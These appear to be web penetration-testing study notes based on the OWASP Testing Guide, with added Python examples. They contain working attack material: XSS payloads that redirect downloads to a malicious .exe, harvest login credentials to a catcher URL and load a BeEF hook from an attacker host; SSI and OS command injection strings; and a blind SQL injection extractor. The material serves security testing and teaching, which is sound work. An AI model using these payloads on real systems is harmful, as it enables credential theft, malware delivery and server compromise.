
Using the Testing Guide: go to pg. 47, look for the control and Ctrl+F the reference number.

OWASP Testing Methodology:

Before development:
1. Policy review
2. Standards review
Definition and design:
1. Requirements review
2. Design and UML model review
3. Architecture review
4. Create and review the threat models
Development:
1. Code walkthroughs
2. Code review
3. Unit and system tests
Maintenance:
1. Change verification
2. Health checks
3. Operational management review
4. Regression tests

Two modes: 1. Passive 2. Active. All the tests below fall under active mode.
The set of active tests is split into 9 sub-categories for a total of 66 controls:
Configuration Management Testing
Business Logic Testing
Authentication Testing
Authorization Testing
Session Management Testing
Data Validation Testing
Denial of Service Testing
Web Services Testing
Ajax Testing
For the above tests we use specific tools.

Black box testing:
Analyze robots.txt using Google Webmaster Tools.
Use site:____ and intext:____ to identify sites and resources; cache:______ gives the cached version of the site.
Grey box testing:
Analyze the entry points; look into the POST and GET methods used.
Use Fiddler for analysing the requests.

SQL INJECTION:
Three types: in-band, out-of-band, inferential (blind).
Steps:
1. Add a semicolon or a single quote to the parameter and watch the response.
2. If we only get a generic 500 server error (no database error text to read), blind SQL injection is in order.
3. Check each field separately.
4. Check how to comment out the rest of the query (-- or /* */).
5. Try changing the parenthesis balance (close any brackets the original query opened around the value).
6. Some code checks that only one tuple is returned; for that, append LIMIT 1 at the end of the payload.
7. Use %20 for all spaces.
8. Try ORDER BY n, increasing n until it errors, to get the number of columns.
9. Then try UNION ALL SELECT with that many columns.
10. For blind injection use SUBSTRING(text, start, length), ASCII(char) and LENGTH(text) to recover a value one character at a time from yes/no answers.
11. LOAD_FILE() (MySQL) adds file contents to the SQL query result.

XSS:
From the response, find the script language in use: JavaScript, ActionScript or VBScript.
Use CAL9000 to work out the encoding in use, e.g. %3cscript%3e for <script>.
Script that rewrites the first link on the page to download a malicious .exe file:
<script>window.onload = function() { var AllLinks = document.getElementsByTagName("a"); AllLinks[0].href = "http://badexample.com/malicious.exe"; }</script>
Proof of concept that shows the cookie:
<script>alert(document.cookie)</script>
For REDIRECTION use:
<script>window.location = "http://www.1.com";</script>
(window.navigate("...") is the IE-only form of the same thing.)
For phishing use (WebGoat's catcher URL collects the typed credentials):
<script>
function hack() {
  alert("Had this been a real attack... Your credentials were just stolen. User Name = " + document.forms[0].user.value + " Password = " + document.forms[0].pass.value);
  XSSImage = new Image;
  XSSImage.src = "http://localhost/WebGoat/catcher?PROPERTY=yes&user=" + document.forms[0].user.value + "&password=" + document.forms[0].pass.value + "";
}
</script>
<form><br><br><HR><H3>This feature requires account login:</H3><br><br>Enter Username:<br><input type="text" id="user" name="user"><br>Enter Password:<br><input type="password" name="pass"><br><input type="submit" name="login" value="login" onclick="hack()"></form><br><br><HR>
Log spoofing (a CRLF in the username forges a second log line):
Smith%0d%0aLogin Succeeded for username: admin
XSS browser exploitation framework (BeEF) hook:
<script src="http://attackersite/beef/hook/beefmagic.js.php"></script>
Setting the HttpOnly attribute on the session cookie adds to security (script cannot read it via document.cookie).
HTTP POST request for file upload:
POST /fileupload.aspx HTTP/1.1
[ ]
Content-Disposition: form-data; name="uploadfile1"; filename="C:\Documents and Settings\test\Desktop\test.txt"
Content-Type: text/plain

test
Forged HTTP POST request (extension says .gif, Content-Type says HTML, body is script):
Content-Disposition: form-data; name="uploadfile1"; filename="C:\Documents and Settings\test\Desktop\test.gif"
Content-Type: text/html

<script>alert(document.cookie)</script>
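The SQL injection steps above (error probing, ORDER BY column counting, UNION, and blind extraction with SUBSTRING/ASCII/LENGTH) worked end to end, as an added example that is not from the OWASP Testing Guide or this cheat sheet. It runs against a deliberately vulnerable login check backed by an in-memory SQLite database with constructed data; SQLite spells the functions substr()/unicode()/length() where MySQL has SUBSTRING()/ASCII()/LENGTH(). The users table, the admin row and the login_vulnerable function are all assumptions made for the example.

```python
# Added example: blind SQL injection against a constructed vulnerable login check.
import sqlite3


def make_db():
    """Constructed sample data: one users table with a single admin row."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER, name TEXT, password TEXT)")
    con.execute("INSERT INTO users VALUES (1, 'admin', 's3cret')")
    con.commit()
    return con


def login_vulnerable(con, username):
    """Deliberately vulnerable: the parameter is concatenated into the query and
    the caller only learns whether exactly one row came back (step 6, LIMIT 1).
    A query that fails to parse is reported as a generic error (step 2)."""
    sql = "SELECT id FROM users WHERE name = '" + username + "' LIMIT 1"
    try:
        rows = con.execute(sql).fetchall()
    except sqlite3.Error:
        return "error"          # the application would show a generic 500 page
    return "ok" if len(rows) == 1 else "no user"


def count_columns(con, max_cols=10):
    """Step 8: ORDER BY n errors once n exceeds the number of selected columns."""
    for n in range(1, max_cols + 1):
        if login_vulnerable(con, f"admin' ORDER BY {n}--") == "error":
            return n - 1
    return max_cols


def union_probe(con, ncols):
    """Step 9: UNION ALL SELECT only parses with the right number of columns."""
    cols = ",".join(["NULL"] * ncols)
    return login_vulnerable(con, f"x' UNION ALL SELECT {cols}--")


def blind_extract(con, column, max_len=32):
    """Step 10: recover a column value one character at a time using only the
    yes/no answer of the login check (inferential / blind injection)."""
    length = 0
    for n in range(1, max_len + 1):              # LENGTH(text) first
        if login_vulnerable(con, f"admin' AND length({column}) = {n}--") == "ok":
            length = n
            break
    value = ""
    for pos in range(1, length + 1):             # then ASCII(SUBSTRING(text, pos, 1))
        for code in range(32, 127):              # printable ASCII; a binary search would cut probes
            probe = f"admin' AND unicode(substr({column}, {pos}, 1)) = {code}--"
            if login_vulnerable(con, probe) == "ok":
                value += chr(code)
                break
    return value


if __name__ == "__main__":
    con = make_db()
    print("single quote ->", login_vulnerable(con, "admin'"))   # generic error: blind it is
    print("columns:", count_columns(con))
    print("union probe:", union_probe(con, count_columns(con)))
    print("password:", blind_extract(con, "password"))
```

Each probe ends with -- so the trailing ' LIMIT 1 of the original query is commented out (step 4); the same payloads would need %20 for the spaces when sent in a URL (step 7).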

Some special variables and functions to look at when analyzing source code:
For PHP:
$_GET - HTTP GET variables
$_POST - HTTP POST variables
$_FILES - HTTP file upload variables
For ASP:
Request.QueryString - HTTP GET
Request.Form - HTTP POST
Server.CreateObject - used to upload files
For JSP:
doGet, doPost - servlet methods handling HTTP GET and POST
request.getParameter - HTTP GET/POST variables

SSL testing:
SSL encrypts requests and responses, and also provides digital certificates for authenticating servers and sometimes even clients.
HTTPS can run on non-standard ports.
Nessus can report weak ciphers in SSL.
Check certificates: the domain name might not match the one in the certificate.

Infrastructure and application admin interfaces:
Use DirBuster to enumerate directories.
See the source code for links left in comments.
Review the server config to find the admin page and server credentials.
Try alternate server ports.
Tamper with the GET and POST requests (e.g. a parameter that marks the user as admin).

Credentials brute forcing:
3 types: dictionary search, search (plain brute force), rule-based search.
Brutus can be used to carry out the attacks.

Bypassing authentication:
Direct page request (forced browsing)
Parameter modification
Session ID prediction
SQL injection

Testing for logout:
See if the browser cache still has some info.
See if the session is completely gone on the server (replay the old session ID).
Try going forward and backward in the browser history.

Testing for race conditions: concurrency in accounts, concurrency in a cart, etc.

For sessions:
See if session IDs are weak (predictable).
Check for session fixation.
Check the cookie attributes:
httponly - keeps the cookie from going out via script (document.cookie)
secure - cookie is only sent over the encrypted tunnel; use it for sensitive data
domain - which hosts receive the cookie (same-origin scope)
path - which paths on the host receive it
expires - whether it persists after the browser is closed

Authorization testing:
Path traversal using ../ (and variants such as ..//)
Forced browsing
Test for CSRF

Testing for XSS:
Use CAL9000 for testing character encodings.
Stored XSS can be exploited further with BeEF.

LDAP injection: check by inserting '(', '|', '&', '*' in the LDAP search field.

ORM injection: an object-relational mapping tool maps DB tables to application objects; it only protects from SQL injection if the application does not build ORM queries by concatenating user input.

XML injection: test by adding ' " < > <!-- & and a CDATA section (Google for its format) in the field.

Server Side Includes (SSI):
Will be on if .shtml is used. The server does certain parsing before a page is sent. It can be exploited and we can even gain remote command execution on the server.
Command examples:
<!--#include virtual="/footer.html" -->   includes the content of a file
<!--#exec cmd="ls" -->                     executes a command
The injection can also be performed in HTTP headers:
GET / HTTP/1.0
Referer: <!--#exec cmd="/bin/ps ax"-->
User-Agent: <!--#include virtual="/proc/version"-->
Characters used by SSI directives: < ! # = / . " - > and [a-zA-Z0-9]

XPath injection: -----

OS command injection:
Example URL before alteration: http://sensitive/cgi-bin/userData.pl?doc=user1.txt
Example URL modified: http://sensitive/cgi-bin/userData.pl?doc=/bin/ls|
This will execute the command /bin/ls (the trailing | makes Perl's open() run the name as a command).
For a .php page, try a semicolon (%3B) after the filename followed by the command.
In a POST request:
Authorization: Basic T2Vbc1Q9Z3V2Tc3e=
Content-Type: application/x-www-form-urlencoded
Content-length: 33

Doc=Doc1.pdf+|+Dir c:\
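A checker for the session cookie attributes listed above (httponly, secure, domain, path, expires), as an added example that is not from the OWASP Testing Guide or this cheat sheet. The Set-Cookie headers it runs over are constructed samples, not captured from any real site, and the site host www.example.com is an assumption.

```python
# Added example: flag weak session cookie attributes in Set-Cookie headers.

# Constructed sample headers (not captured from any real site).
SAMPLE_HEADERS = [
    "Set-Cookie: JSESSIONID=A1B2C3; Path=/; HttpOnly; Secure",
    "Set-Cookie: PHPSESSID=xyz; Path=/",
    "Set-Cookie: auth=tok; Domain=.example.com; Path=/; "
    "Expires=Wed, 01 Jan 2031 00:00:00 GMT; Secure",
]


def parse_set_cookie(header):
    """Split one Set-Cookie header into the cookie name and a dict of its
    attributes (names lower-cased; flag attributes such as HttpOnly map to True)."""
    value = header.split(":", 1)[1] if header.lower().startswith("set-cookie:") else header
    parts = [p.strip() for p in value.split(";")]
    name = parts[0].split("=", 1)[0].strip()
    attrs = {}
    for part in parts[1:]:
        if "=" in part:
            key, val = part.split("=", 1)
            attrs[key.strip().lower()] = val.strip()
        elif part:
            attrs[part.lower()] = True
    return name, attrs


def check_cookie(header, site_host="www.example.com"):
    """Return (name, findings) for one Set-Cookie header; each finding is one
    of the attribute checks from the session testing notes."""
    name, attrs = parse_set_cookie(header)
    findings = []
    if "httponly" not in attrs:
        findings.append("missing HttpOnly: readable via document.cookie, so XSS can steal it")
    if "secure" not in attrs:
        findings.append("missing Secure: also sent over plain HTTP")
    domain = attrs.get("domain")
    if domain and domain.lstrip(".") != site_host:
        findings.append(f"Domain={domain} is broader than {site_host}: shared with sibling hosts")
    if attrs.get("path", "/") == "/":
        findings.append("Path=/ (default): sent to every application on the host")
    if "expires" in attrs or "max-age" in attrs:
        findings.append("persistent cookie: survives browser close (Expires/Max-Age set)")
    return name, findings


def check_all(headers=SAMPLE_HEADERS, site_host="www.example.com"):
    """Map cookie name -> list of findings for every header given."""
    return dict(check_cookie(h, site_host) for h in headers)


if __name__ == "__main__":
    for cookie, findings in check_all().items():
        print(cookie, "->", findings or ["no findings"])
```

The Path=/ finding is informational: it is the default most session cookies ship with, but on a shared host it is the attribute that lets a weaker application on the same host receive the session cookie.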
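The OS command injection pattern above (a doc= parameter handed to a shell, so a trailing | or ; runs extra commands) rewritten as a Python handler, first the vulnerable way and then hardened with an allow-list and no shell. This is an added example, not from the OWASP Testing Guide, this cheat sheet or the userData.pl script it mentions; it assumes a POSIX shell with cat and echo available, and creates its own sample document in a temporary folder.

```python
# Added example: vulnerable vs. hardened document viewer (OS command injection).
import os
import re
import subprocess
import tempfile

# Stand-in for the application's document folder, with one constructed file.
DOC_DIR = tempfile.mkdtemp()
with open(os.path.join(DOC_DIR, "user1.txt"), "w") as fh:
    fh.write("hello from user1\n")


def show_doc_vulnerable(doc):
    """Vulnerable: the doc parameter is interpolated into a shell command line,
    so 'user1.txt; id' or 'user1.txt | ls' runs extra commands, exactly like
    the trailing | in the Perl open() example above."""
    cmd = f"cat {DOC_DIR}/{doc}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


SAFE_NAME = re.compile(r"^[A-Za-z0-9_.-]+$")   # no / \ ; | & ` $ or whitespace


def show_doc_hardened(doc):
    """Hardened: allow-list the filename, refuse dot-files and traversal, and
    run the program with an argument list so no shell ever parses the value."""
    if not SAFE_NAME.match(doc) or doc.startswith("."):
        raise ValueError("invalid document name")
    path = os.path.realpath(os.path.join(DOC_DIR, doc))
    if os.path.dirname(path) != os.path.realpath(DOC_DIR):
        raise ValueError("path escapes the document folder")
    return subprocess.run(["cat", path], capture_output=True, text=True,
                          check=True).stdout


def hardened_rejects(doc):
    """True when the hardened handler refuses the value."""
    try:
        show_doc_hardened(doc)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    payload = "user1.txt; echo INJECTED"
    print("vulnerable:", show_doc_vulnerable(payload))
    print("hardened rejects payload:", hardened_rejects(payload))
    print("hardened on a good name:", show_doc_hardened("user1.txt"))
```

Validating the name and then executing without a shell are both needed: the allow-list stops the metacharacters, and the argument list means that even a name that slips through is only ever a single argv entry for cat, never a command line.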